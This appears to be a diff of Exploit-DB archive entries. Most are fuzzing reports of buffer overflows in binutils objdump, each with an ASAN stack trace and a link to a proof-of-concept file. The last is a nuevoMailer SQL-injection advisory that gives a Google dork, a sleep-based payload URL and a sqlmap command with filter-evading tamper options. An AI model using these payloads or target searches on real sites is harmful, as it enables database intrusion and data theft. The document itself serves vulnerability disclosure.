+  in disassemble_data at binutils/objdump.c:2445
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+  in dump_bfd at binutils/objdump.c:3547
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+  in display_file at binutils/objdump.c:3714
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+  in main at binutils/objdump.c:4016
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Input: eaa0ea31671f33585380fa20a9e48279.3eb5986fdbd0116801326df1767e6ef0.min
+Output: eaa0ea31671f33585380fa20a9e48279.3eb5986fdbd0116801326df1767e6ef0.txt
+
+Error in "decode_pseudodbg_assert_0": global-buffer-overflow
+  in decode_pseudodbg_assert_0 at opcodes/bfin-dis.c:4596
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4596)
+  in _print_insn_bfin at opcodes/bfin-dis.c:4760
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4760)
+  in print_insn_bfin at opcodes/bfin-dis.c:4778
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4778)
+  in disassemble_bytes at binutils/objdump.c:1864
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
+  in disassemble_section at binutils/objdump.c:2309
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+  in bfd_map_over_sections at bfd/section.c:1395
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
+  in disassemble_data at binutils/objdump.c:2445
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+  in dump_bfd at binutils/objdump.c:3547
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+  in display_file at binutils/objdump.c:3714
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+  in main at binutils/objdump.c:4016
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Additional Information:
+The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42201.zip

platforms/linux/dos/42202.txt

@@ -0,0 +1,37 @@
+Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21582
+
+I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
+
+Please find attached the minimized file causing the issue ("Input") and the
+ASAN report log ("Output"). Below is the reduced stacktrace with links to the
+corresponding source lines on a GitHub mirror.
+
+The command I used was `objdump -D <file>`.
+
+Let me know if there is any additional information I can provide.
+
+--
+
+Input: ef51bcdcaae667058b002f94b5dafd05.12926af7cc4fab77f87a3ec70a329100.min
+Output: ef51bcdcaae667058b002f94b5dafd05.12926af7cc4fab77f87a3ec70a329100.txt
+
+Error in "ieee_object_p": stack-buffer-overflow
+  in ieee_object_p at bfd/ieee.c:1985
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L1985)
+  in bfd_check_format_matches at bfd/format.c:311
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/format.c#L311)
+  in display_object_bfd at binutils/objdump.c:3602
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3602)
+  in display_any_bfd at binutils/objdump.c:3693
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3693)
+  in display_file at binutils/objdump.c:3714
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+  in main at binutils/objdump.c:4016
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Additional Information:
+The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42202.zip

platforms/linux/dos/42203.txt

@@ -0,0 +1,43 @@
+Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21576
+
+I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
+
+Please find attached the minimized file causing the issue ("Input") and the
+ASAN report log ("Output"). Below is the reduced stacktrace with links to the
+corresponding source lines on a GitHub mirror.
+
+The command I used was `objdump -D <file>`.
+
+Let me know if there is any additional information I can provide.
+
+--
+
+Input: 2a13a720199253614962e0bb4402d98c.9149a6478708ae7cb458345e7cbc9354.min
+Output: 2a13a720199253614962e0bb4402d98c.9149a6478708ae7cb458345e7cbc9354.txt
+
+Error in "print_insn_score16": global-buffer-overflow
+  in print_insn_score16 at opcodes/score7-dis.c:723
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/score7-dis.c#L723)
+  in s7_print_insn at opcodes/score7-dis.c:954
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/score7-dis.c#L954)
+  in disassemble_bytes at binutils/objdump.c:1864
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
+  in disassemble_section at binutils/objdump.c:2309
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+  in bfd_map_over_sections at bfd/section.c:1395
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
+  in disassemble_data at binutils/objdump.c:2445
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+  in dump_bfd at binutils/objdump.c:3547
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+  in display_file at binutils/objdump.c:3714
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+  in main at binutils/objdump.c:4016
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+Additional Information:
+The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42203.zip

platforms/linux/dos/42204.txt

@@ -0,0 +1,44 @@
+Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21595
+
+I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
+
+Please find attached the minimized file causing the issue ("Input") and the ASAN report log ("Output"). Below is the reduced stacktrace with links to the corresponding source lines on a GitHub mirror.
+
+The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
+
+Let me know if there is any additional information I can provide.
+
+--
+
+Input: 3ade4a4333249762a9df82c47f3c111a.65dbcbffa0f6467be847e1372688623b.min
+Output: 3ade4a4333249762a9df82c47f3c111a.65dbcbffa0f6467be847e1372688623b.txt
+
+Error in "aarch64_ext_ldst_reglist": global-buffer-overflow
+  in aarch64_ext_ldst_reglist at opcodes/aarch64-dis.c:412
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L412)
+  in aarch64_opcode_decode at opcodes/aarch64-dis.c:2739
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L2739)
+  in aarch64_decode_insn at opcodes/aarch64-dis.c:2831
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L2831)
+  in print_insn_aarch64_word at opcodes/aarch64-dis.c:2973
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L2973)
+  in print_insn_aarch64 at opcodes/aarch64-dis.c:3209
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L3209)
+  in disassemble_bytes at binutils/objdump.c:1864
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
+  in disassemble_section at binutils/objdump.c:2309
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
+  in bfd_map_over_sections at bfd/section.c:1395
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
+  in disassemble_data at binutils/objdump.c:2445
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
+  in dump_bfd at binutils/objdump.c:3547
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
+  in display_file at binutils/objdump.c:3714
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
+  in main at binutils/objdump.c:4016
+    (see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42204.zip

platforms/php/webapps/42193.txt

@@ -0,0 +1,27 @@
+# Exploit Title: nuevoMailer version 6.0 and earlier time-based SQL Injection
+# Exploit Author: ALEH BOITSAU
+# Google Dork: inurl:/inc/rdr.php?
+# Date: 2017-06-09
+# Vendor Homepage: https://www.nuevomailer.com/
+# Version: 6.0 and earlier
+# Tested on: Linux
+# CVE: CVE-2017-9730
+
+Description: SQL injection vulnerability in rdr.php in nuevoMailer version 6.0 and earlier 
+allows remote attackers to execute arbitrary SQL commands via the "r" parameter. 
+
+PoC:
+
+https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556[time based SQL INJ]
+
+https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+
+
+sqlmap -u "http://vulnerable_site.com/inc/rdr.php?r=120c44c5" --dbms=mysql -p r --tamper=equaltolike,between  --hostname --technique=T -v 3 --random-agent --time-sec=4
+
+NB: "equaltolike" and "between" arsenal to defeat filtering! Data retrieval process may take more than usual time.
+
+Disclosure Timeline:
+2017-06-09: Vendor has been notified
+2017-06-09: Vendor responded with intention to fix the vulnerability
+2017-06-16: CVE number acquired
+2017-06-16: Public disclosure